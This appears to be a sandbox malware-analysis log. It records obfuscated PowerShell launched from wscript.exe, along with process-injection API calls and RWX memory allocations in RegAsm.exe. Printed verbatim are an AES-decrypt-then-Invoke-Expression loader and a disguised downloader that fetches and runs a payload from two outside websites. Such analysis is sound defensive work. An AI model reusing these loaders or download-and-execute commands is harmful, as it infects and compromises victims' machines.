Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process Stats: CPU usage > 49%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process Stats: CPU usage > 49%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	16_2_004180EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	16_2_004132D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,	16_2_0041BB09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,	16_2_0041BB35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	18_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00401806 NtdllDefWindowProc_W,	18_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_004018C0 NtdllDefWindowProc_W,	18_2_004018C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004016FD NtdllDefWindowProc_A,	19_2_004016FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004017B7 NtdllDefWindowProc_A,	19_2_004017B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00402CAC NtdllDefWindowProc_A,	21_2_00402CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00402D66 NtdllDefWindowProc_A,	21_2_00402D66

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,

16_2_004167B4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00419689	12_2_00419689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0043E0CC	16_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041F0FA	16_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00454159	16_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00438168	16_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004461F0	16_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0043E2FB	16_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0045332B	16_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0042739D	16_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004374E6	16_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0043E558	16_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00438770	16_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004378FE	16_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00433946	16_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0044D9C9	16_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00427A46	16_2_00427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041DB62	16_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00427BAF	16_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00437D33	16_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00435E5E	16_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00426E0E	16_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0043DE9D	16_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00413FCA	16_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00436FEA	16_2_00436FEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_10017194	16_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1000B5C1	16_2_1000B5C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044B040	18_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0043610D	18_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00447310	18_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044A490	18_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0040755A	18_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0043C560	18_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044B610	18_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044D6C0	18_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_004476F0	18_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044B870	18_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044081D	18_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00414957	18_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_004079EE	18_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00407AEB	18_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044AA80	18_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00412AA9	18_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00404B74	18_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00404B03	18_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044BBD8	18_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00404BE5	18_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00404C76	18_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00415CFE	18_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00416D72	18_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00446D30	18_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00446D8B	18_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00406E8F	18_2_00406E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00405038	19_2_00405038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0041208C	19_2_0041208C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004050A9	19_2_004050A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0040511A	19_2_0040511A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0043C13A	19_2_0043C13A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004051AB	19_2_004051AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00449300	19_2_00449300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0040D322	19_2_0040D322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0044A4F0	19_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0043A5AB	19_2_0043A5AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00413631	19_2_00413631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00446690	19_2_00446690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0044A730	19_2_0044A730
